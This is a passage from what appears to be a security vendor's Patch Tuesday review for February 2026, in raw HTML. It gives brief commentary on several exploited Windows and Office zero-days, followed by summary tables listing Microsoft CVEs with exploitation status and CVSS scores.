Happily, the Preview Pane is not a vector, which raises the bar slightly for an attacker, since the user must explicitly open the malicious file or web page.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Ultimately, although none of the advisories for </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21510"><span style='font-size: undefined;'>CVE-2026-21510</span></a><span style='font-size: undefined;'>, </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21513"><span style='font-size: undefined;'>CVE-2026-21513</span></a><span style='font-size: undefined;'>, or </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21514"><span style='font-size: undefined;'>CVE-2026-21514</span></a><span style='font-size: undefined;'> explicitly come out and say it, it’s likely that exploitation in each case involves tricking Windows into participating in another Mark-of the Web laundering scheme using flaws in old components.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Windows DWM: zero-day elevation of privilege</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>For the </span><a href="https://www.rapid7.com/blog/post/em-patch-tuesday-january-2026/"><span style='font-size: undefined;'>second month in a row</span></a><span style='font-size: undefined;'>, the Windows Desktop Windows Manager (DWM) is the site of an exploited-in-the-wild zero-day vulnerability. Last month’s </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20805"><span style='font-size: undefined;'>CVE-2026-20805</span></a><span style='font-size: undefined;'> was an information disclosure vulnerability, effectively a treasure map for threat actors seeking the otherwise obfuscated in-memory address of the kernel-space DWM process. The publication of zero-day elevation of privilege (EoP) vulnerability </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21519"><span style='font-size: undefined;'>CVE-2026-21519</span></a><span style='font-size: undefined;'> today very likely reflects MSTIC and MSRC working to thwart the same threat actor in both cases. As Rapid7 has noted in the past, initial access coupled with local elevation of privilege vulnerabilities is the staple diet of many successful attackers, so the lower CVSS v3 base score of 7.8 seen here versus a broadly equivalent remote code execution is not a sign to delay patching.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Remote Desktop Services: zero-day elevation of privilege</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Remote Desktop Services (RDP) are designed to allow a duly authorized remote user to interact with the server, but </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21533"><span style='font-size: undefined;'>CVE-2026-21533</span></a><span style='font-size: undefined;'> allows an unauthorized local user to elevate privileges to SYSTEM. Every Windows Server product back as far as Server 2012 receives patches, so this one has been present for a while. It’s possible that today’s patches close off a long-running exploitation story for at least one threat actor.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>RasMan: zero-day denial of service</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Exploited in the wild, but perhaps of less concern is </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21525"><span style='font-size: undefined;'>CVE-2026-21525</span></a><span style='font-size: undefined;'>, a local denial of service vulnerability in the Windows Remote Access Connection Manager (RasMan). Somewhat unusually for a local vulnerability, the advisory sets out that no privileges are required at all, so even a guest account can exploit this one. You have disabled those guest accounts, right?</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Microsoft lifecycle update</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>There are no significant Microsoft product lifecycle changes this month.</span></p><h2>Summary Charts</h2><h2></h2><figure style="margin: 0; text-align: center"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt8a3a040eb034c75b/698bdf8995a6d9d39244961b/2026-02-vuln_count_component.png" alt="A bar chart showing vulnerability count by component for Microsoft Patch Tuesday 2026-Feb" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="A bar chart showing vulnerability count by component for Microsoft Patch Tuesday 2026-Feb" style="text-align: center; width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt8a3a040eb034c75b/698bdf8995a6d9d39244961b/2026-02-vuln_count_component.png" data-sys-asset-uid="blt8a3a040eb034c75b" data-sys-asset-filename="2026-02-vuln_count_component.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="A bar chart showing vulnerability count by component for Microsoft Patch Tuesday 2026-Feb" data-sys-asset-position="center" sys-style-type="display"/></figure><figure style="margin: 0; text-align: center"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltb36d2d5322b1880f/698bdf89162d1ddd43c3e3c8/2026-02-vuln_count_impact.png" alt="A bar chart showing vulnerability count by impact for Microsoft Patch Tuesday 2026-Feb" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="A bar chart showing vulnerability count by impact for Microsoft Patch Tuesday 2026-Feb" style="text-align: center; width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltb36d2d5322b1880f/698bdf89162d1ddd43c3e3c8/2026-02-vuln_count_impact.png" data-sys-asset-uid="bltb36d2d5322b1880f" data-sys-asset-filename="2026-02-vuln_count_impact.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="A bar chart showing vulnerability count by impact for Microsoft Patch Tuesday 2026-Feb" data-sys-asset-position="center" sys-style-type="display"/></figure><figure style="margin: 0; text-align: center"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt3189fa96efcda356/698bdf896822250b88d78f57/2026-02-vuln_count_impact-component-heatmap.png" alt="A bar chart showing distribution of impact type by component for Microsoft Patch Tuesday 2026-Feb" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="A bar chart showing distribution of impact type by component for Microsoft Patch Tuesday 2026-Feb" style="text-align: center; width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt3189fa96efcda356/698bdf896822250b88d78f57/2026-02-vuln_count_impact-component-heatmap.png" data-sys-asset-uid="blt3189fa96efcda356" data-sys-asset-filename="2026-02-vuln_count_impact-component-heatmap.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="A bar chart showing distribution of impact type by component for Microsoft Patch Tuesday 2026-Feb" data-sys-asset-position="center" sys-style-type="display"/></figure><h2>Summary Tables</h2><p></p><h3>Apps vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploitation status</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSS v3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20841">CVE-2026-20841</a></td><td><p>Windows Notepad App Remote Code Execution Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>8.8</p></td></tr></tbody></table><h3>Azure vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploitation status</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSS v3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21512">CVE-2026-21512</a></td><td><p>Azure DevOps Server Cross-Site Scripting Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>6.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21529">CVE-2026-21529</a></td><td><p>Azure HDInsight Spoofing Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>5.7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21528">CVE-2026-21528</a></td><td><p>Azure IoT Explorer Information Disclosure Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>6.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21228">CVE-2026-21228</a></td><td><p>Azure Local Remote Code Execution Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>8.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21531">CVE-2026-21531</a></td><td><p>Azure SDK for Python Remote Code Execution Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>9.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21522">CVE-2026-21522</a></td><td><p>Microsoft ACI Confidential Containers Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>6.7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-23655">CVE-2026-23655</a></td><td><p>Microsoft ACI Confidential Containers Information Disclosure Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>6.5</p></td></tr></tbody></table><h3>Developer Tools vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploitation status</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSS v3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21218">CVE-2026-21218</a></td><td><p>.NET Spoofing Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21523">CVE-2026-21523</a></td><td><p>GitHub Copilot and Visual Studio Code Remote Code Execution Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>8.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21518">CVE-2026-21518</a></td><td><p>GitHub Copilot and Visual Studio Code Security Feature Bypass Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>6.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21257">CVE-2026-21257</a></td><td><p>GitHub Copilot and Visual Studio Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>8.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21256">CVE-2026-21256</a></td><td><p>GitHub Copilot and Visual Studio Remote Code Execution Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>8.8</p></td></tr></tbody></table><h3>ESU vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploitation status</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSS v3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21519">CVE-2026-21519</a></td><td><p>Desktop Window Manager Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Detected</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20846">CVE-2026-20846</a></td><td><p>GDI+ Denial of Service Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21253">CVE-2026-21253</a></td><td><p>Mailslot File System Elevation of Privilege Vulnerability</p></td><td><p>Exploitation More Likely</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21527">CVE-2026-21527</a></td><td><p>Microsoft Exchange Server Spoofing Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>6.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21513">CVE-2026-21513</a></td><td><p>MSHTML Framework Security Feature Bypass Vulnerability</p></td><td><p>Exploitation Detected</p></td><td><p>Yes</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21236">CVE-2026-21236</a></td><td><p>Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21238">CVE-2026-21238</a></td><td><p>Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability</p></td><td><p>Exploitation More Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21234">CVE-2026-21234</a></td><td><p>Windows Connected Devices Platform Service Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21246">CVE-2026-21246</a></td><td><p>Windows Graphics Component Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21235">CVE-2026-21235</a></td><td><p>Windows Graphics Component Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21240">CVE-2026-21240</a></td><td><p>Windows HTTP.sys Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21248">CVE-2026-21248</a></td><td><p>Windows Hyper-V Remote Code Execution Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21247">CVE-2026-21247</a></td><td><p>Windows Hyper-V Remote Code Execution Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21244">CVE-2026-21244</a></td><td><p>Windows Hyper-V Remote Code Execution Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21255">CVE-2026-21255</a></td><td><p>Windows Hyper-V Security Feature Bypass Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21239">CVE-2026-21239</a></td><td><p>Windows Kernel Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21231">CVE-2026-21231</a></td><td><p>Windows Kernel Elevation of Privilege Vulnerability</p></td><td><p>Exploitation More Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21222">CVE-2026-21222</a></td><td><p>Windows Kernel Information Disclosure Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21249">CVE-2026-21249</a></td><td><p>Windows NTLM Spoofing Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>3.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21525">CVE-2026-21525</a></td><td><p>Windows Remote Access Connection Manager Denial of Service Vulnerability</p></td><td><p>Exploitation Detected</p></td><td><p>No</p></td><td><p>6.2</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21533">CVE-2026-21533</a></td><td><p>Windows Remote Desktop Services Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Detected</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21510">CVE-2026-21510</a></td><td><p>Windows Shell Security Feature Bypass Vulnerability</p></td><td><p>Exploitation Detected</p></td><td><p>Yes</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21508">CVE-2026-21508</a></td><td><p>Windows Storage Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21242">CVE-2026-21242</a></td><td><p>Windows Subsystem for Linux Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21237">CVE-2026-21237</a></td><td><p>Windows Subsystem for Linux Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.0</p></td></tr></tbody></table><h3>Microsoft Office vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploitation status</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSS v3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21259">CVE-2026-21259</a></td><td><p>Microsoft Excel Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21258">CVE-2026-21258</a></td><td><p>Microsoft Excel Information Disclosure Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21261">CVE-2026-21261</a></td><td><p>Microsoft Excel Information Disclosure Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21260">CVE-2026-21260</a></td><td><p>Microsoft Outlook Spoofing Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21511">CVE-2026-21511</a></td><td><p>Microsoft Outlook Spoofing Vulnerability</p></td><td><p>Exploitation More Likely</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21514">CVE-2026-21514</a></td><td><p>Microsoft Word Security Feature Bypass Vulnerability</p></td><td><p>Exploitation Detected</p></td><td><p>Yes</p></td><td><p>7.8</p></td></tr></tbody></table><h3>Other vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploitation status</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSS v3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21516">CVE-2026-21516</a></td><td><p>GitHub Copilot for Jetbrains Remote Code Execution Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>8.8</p></td></tr></tbody></table><h3>Server Software vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploitation status</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSS v3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21527">CVE-2026-21527</a></td><td><p>Microsoft Exchange Server Spoofing Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>6.5</p></td></tr></tbody></table><h3>SQL Server vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploitation status</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSS v3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21229">CVE-2026-21229</a></td><td><p>Power BI Remote Code Execution Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>8.0</p></td></tr></tbody></table><h3>System Center vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploitation status</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSS v3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21537">CVE-2026-21537</a></td><td><p>Microsoft Defender for Endpoint Linux Extension Remote Code Execution Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>8.8</p></td></tr></tbody></table><h3>Windows vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploitation status</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSS v3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21251">CVE-2026-21251</a></td><td><p>Cluster Client Failover (CCF) Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21519">CVE-2026-21519</a></td><td><p>Desktop Window Manager Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Detected</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20846">CVE-2026-20846</a></td><td><p>GDI+ Denial of Service Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21253">CVE-2026-21253</a></td><td><p>Mailslot File System Elevation of Privilege Vulnerability</p></td><td><p>Exploitation More Likely</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21513">CVE-2026-21513</a></td><td><p>MSHTML Framework Security Feature Bypass Vulnerability</p></td><td><p>Exploitation Detected</p></td><td><p>Yes</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2023-2804">CVE-2023-2804</a></td><td><p>Red Hat, Inc. CVE-2023-2804: Heap Based Overflow libjpeg-turbo</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>6.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21236">CVE-2026-21236</a></td><td><p>Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21241">CVE-2026-21241</a></td><td><p>Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability</p></td><td><p>Exploitation More Likely</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21238">CVE-2026-21238</a></td><td><p>Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability</p></td><td><p>Exploitation More Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21517">CVE-2026-21517</a></td><td><p>Windows App for Mac Installer Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21234">CVE-2026-21234</a></td><td><p>Windows Connected Devices Platform Service Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21246">CVE-2026-21246</a></td><td><p>Windows Graphics Component Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21235">CVE-2026-21235</a></td><td><p>Windows Graphics Component Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21250">CVE-2026-21250</a></td><td><p>Windows HTTP.sys Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21240">CVE-2026-21240</a></td><td><p>Windows HTTP.sys Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21232">CVE-2026-21232</a></td><td><p>Windows HTTP.sys Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21248">CVE-2026-21248</a></td><td><p>Windows Hyper-V Remote Code Execution Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21247">CVE-2026-21247</a></td><td><p>Windows Hyper-V Remote Code Execution Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21244">CVE-2026-21244</a></td><td><p>Windows Hyper-V Remote Code Execution Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21255">CVE-2026-21255</a></td><td><p>Windows Hyper-V Security Feature Bypass Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21245">CVE-2026-21245</a></td><td><p>Windows Kernel Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21239">CVE-2026-21239</a></td><td><p>Windows Kernel Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21231">CVE-2026-21231</a></td><td><p>Windows Kernel Elevation of Privilege Vulnerability</p></td><td><p>Exploitation More Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21222">CVE-2026-21222</a></td><td><p>Windows Kernel Information Disclosure Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21243">CVE-2026-21243</a></td><td><p>Windows Lightweight Directory Access Protocol (LDAP) Denial of Service Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21249">CVE-2026-21249</a></td><td><p>Windows NTLM Spoofing Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>3.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21525">CVE-2026-21525</a></td><td><p>Windows Remote Access Connection Manager Denial of Service Vulnerability</p></td><td><p>Exploitation Detected</p></td><td><p>No</p></td><td><p>6.2</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21533">CVE-2026-21533</a></td><td><p>Windows Remote Desktop Services Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Detected</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21510">CVE-2026-21510</a></td><td><p>Windows Shell Security Feature Bypass Vulnerability</p></td><td><p>Exploitation Detected</p></td><td><p>Yes</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21508">CVE-2026-21508</a></td><td><p>Windows Storage Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21242">CVE-2026-21242</a></td><td><p>Windows Subsystem for Linux Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21237">CVE-2026-21237</a></td><td><p>Windows Subsystem for Linux Elevation 